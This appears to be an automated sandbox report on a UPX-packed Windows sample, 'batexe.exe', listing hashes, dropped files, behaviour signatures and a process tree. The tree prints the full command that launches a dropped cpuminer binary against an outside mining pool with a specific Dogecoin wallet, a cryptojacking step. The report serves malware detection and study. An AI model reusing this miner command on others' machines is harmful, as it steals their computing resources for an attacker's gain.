73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
297s
platform
windows10-1703_x64
resource
win10-20240221-ja
resource tags

arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
22/02/2024, 02:10

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1396	b2e.exe
4004	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4004	cpuminer-sse2.exe
4004	cpuminer-sse2.exe
4004	cpuminer-sse2.exe
4004	cpuminer-sse2.exe
4004	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/320-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 320 wrote to memory of 1396	320	batexe.exe	75
PID 320 wrote to memory of 1396	320	batexe.exe	75
PID 320 wrote to memory of 1396	320	batexe.exe	75
PID 1396 wrote to memory of 4060	1396	b2e.exe	76
PID 1396 wrote to memory of 4060	1396	b2e.exe	76
PID 1396 wrote to memory of 4060	1396	b2e.exe	76
PID 4060 wrote to memory of 4004	4060	cmd.exe	79
PID 4060 wrote to memory of 4004	4060	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:320
- C:\Users\Admin\AppData\Local\Temp\17C9.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\17C9.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\17C9.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1CE9.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4060
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4004

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\17C9.tmp\b2e.exe

Filesize
4.5MB

MD5
38622d165bdec7e6a2695e68f8151299

SHA1
bc52287388b6d3a0512df37e5e2117040650278b

SHA256
9d270a1d9a6553683821d0dbadbd492f2de5cbb2615c8bda0f9313f341f9dcc5

SHA512
8f1bcb1384c03c4344f01487dc53dde876b1c2483fbef9d1d062f7c0a666bcd6b9e99d2e9b3534d5f9df6062ee9fc9e3ee16e1abf7b182aa8afda1a2f4ac880c

Download Submit
C:\Users\Admin\AppData\Local\Temp\17C9.tmp\b2e.exe

Filesize
4.6MB

MD5
99b6e85bd0eae10fbf4a88e25dcac698

SHA1
7b6f2e06f4a101cbc43cc7496b8ce6fce2fc232e

SHA256
32f989143038788959adf535e4d8e4db80ecdb0168bdd5663f276bdc84c37cb0

SHA512
1ffc5ae9235eebc5af0900a5abedb20259b4939397b32773285a00f49acb35e22deabc36153edf58138b199e2321c0fc94ef14b48f6b79b4720b1447e6a7de62

Download Submit
C:\Users\Admin\AppData\Local\Temp\1CE9.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
733KB

MD5
ed4292f7185fbc382272789b268f695f

SHA1
92a4cd443a5dd1fec3234b752fc76b9fc4cf4ec7

SHA256
eb9de98cee5f2999e01c34b81b0520a5fe05ee69b0d34184f6108abd0d7cd1a7

SHA512
472cbc32fc6413bf2226cbdec4c174bbe84a93eff8fdcb38634d0ddfc1414e10176d6cbbd0f7af51edc8f0d826c3b869dcc5bcdc2e301d3c4f5626f7510ffe29

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
64KB

MD5
42871db599b90c630b2d75268c8b0116

SHA1
fb3a97b9517d4abe248a7c1a0fe0f528f40b29bc

SHA256
80110dd27dac90724987601037bc7d4bccdce1afd95aeffbfd8cacd813b891cb

SHA512
c32a1b46ab54abcaf179759b2aaa5aeec58a353ebe552b09ce1980ab54a9c702ae1e348c2a9c2020f74fa7c7bfb4d4bac78396f76b6bac04227436deca800438

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
430KB

MD5
e19d53e4c7934e8b625e837fe4121c9a

SHA1
c6a8b0741cf48f2893fa7aefe207cfa5e388da98

SHA256
81686be36aa678ec9f95434034362b05539f64d1921d1dfc599f76b68edb5cc2

SHA512
44689b3f39b505765d6ab007669c618a3333a4826ecd910a17c1ad694bcb2b39c51907cd541fcede25ecbecb943336b5016ab63f8e03e12dd2c0f97c583211d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
353KB

MD5
2d1cb175e19a9982f637800d8edcb846

SHA1
e58b0010ece5aa5f40a051fc08ab42aa94458a93

SHA256
03273a9212eaa467ce926abf1a044c1942c9248928c555b4e6df495fcdf506b4

SHA512
60cb40aa9f6c3687cd5ca12801a503d3ab4e27e6ef85d20ae738c8083bd532ae0bedfb15f45db746490a1ad718e8ada6a494b6e7656d32de4da97f787aec7ac4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
405KB

MD5
563d0e02fb5a16680d98d20e4892174f

SHA1
a6d48d169e9939f80bc17d5d5bd5cd3569ab29d1

SHA256
3c452e611421457f5cd1e2ad03c3030c5f2cb07d04ab9de02ae3f7d544c7a6f4

SHA512
0733caa3a27482d9c761999c6231786e27be50d22a558a1c517c253f1df7a806389de95c2fcd6b5a1751095bae87b081b46c4738f18d01032be05de659503aaf

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
360KB

MD5
97315d37d927a95c948a195e2b81668e

SHA1
7685d9b9470fa1223363a0c4c12305ed243c3baa

SHA256
cc3ef1321bccfbb8a0cb0ee7de937ba95ebcb88983faea8eaf4ffdf1133105ad

SHA512
8dd8a320a73b7ddf0b8fad03a13900c04c07c851ef4b6e3e30bc9487dd0b247080edbd50776b999fb039b9085746e8abbfe60a8db884d41a9fc3492c67e72863

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
338KB

MD5
7b881597e38d718c295eb97dc2f1c81c

SHA1
ec0fa11effb7ff99e8b004aa591f27862495436b

SHA256
9aec87e452880f379f43ba6d69153c8b457f30a2db23e211ab4c3bd2d0cff745

SHA512
5a980569e42814c6a2de40c88ec49ad37fa72c941f29b50776445df83fa1bc4cc134f7d6320e3c25396e56ca8ce5fa7a9c1754caba8b5a38c7f3034ca7022a7e

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
373KB

MD5
ce3a41710847949d37648948e308df46

SHA1
8cd9d7a6bd4ee2deeb5e2243e53cc1d84635ddd4

SHA256
23b83cc0e2bcbc3fcd6bd48a9e47af22f93ac78c97de5522b7be34feffd41883

SHA512
09770835cc5d0987d78b93b5f7a197c2b4fad571dcdb19bb95980ac797bac03d40751d89437754960dff94cc7c33cb20b60341dab96f88839a956bd208467716

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
402KB

MD5
37952cd717a7a794f6c801eac2d80a9d

SHA1
bed823b7e8ae9e4c115586a1144a373bd2a5e723

SHA256
b897673ae75f912dd079004ce524201be32896d8a767535351594015271c068c

SHA512
a17f5d4ec907c569f21ec59a83afad34e2c8bd70a014eeddedd3272b0e42c80578e8115abfe873242f403271b4ea0be1c516355a9b4022e87c3024efcaf9bfce

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
285KB

MD5
82a8bb928f268ae244b37d247fc1071f

SHA1
8380841d07578f03c2ee7d50164f27515ea8a578

SHA256
2b9e0ca6d03b19243e631a09f7c4437694e0ad16f3cec5005d617d85f1860ade

SHA512
21efb220d3d9df7f148fb5d0d25a18090328062e09085ab4c6ae07788d9af0d1def60148540a83646fba76f9f68531cf37bba0d392190bf708d304b43832fd1b

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
284KB

MD5
9d39a2aca34cbf0600bf709557d07e73

SHA1
7dfbac027c507ca456539dce440fccacb5390dda

SHA256
59d7934c0762b9380864625d7079e85ccbfbb4d3bbce3821be3945a37c7425f8

SHA512
1157ed1626d038fe173af6ff083487f3ffee4db9b4886126f77022f8048bb2e83a9f98dfd9f4a4953b196b69ae7c078bd3eb832c880e17f6f4534f6325401c4d

Download Submit
memory/320-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/1396-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1396-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4004-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4004-43-0x0000000061DB0000-0x0000000061E48000-memory.dmp

Filesize
608KB

Download
memory/4004-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4004-44-0x0000000001050000-0x0000000002905000-memory.dmp

Filesize
24.7MB

Download
memory/4004-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4004-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4004-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4004-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4004-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4004-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4004-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download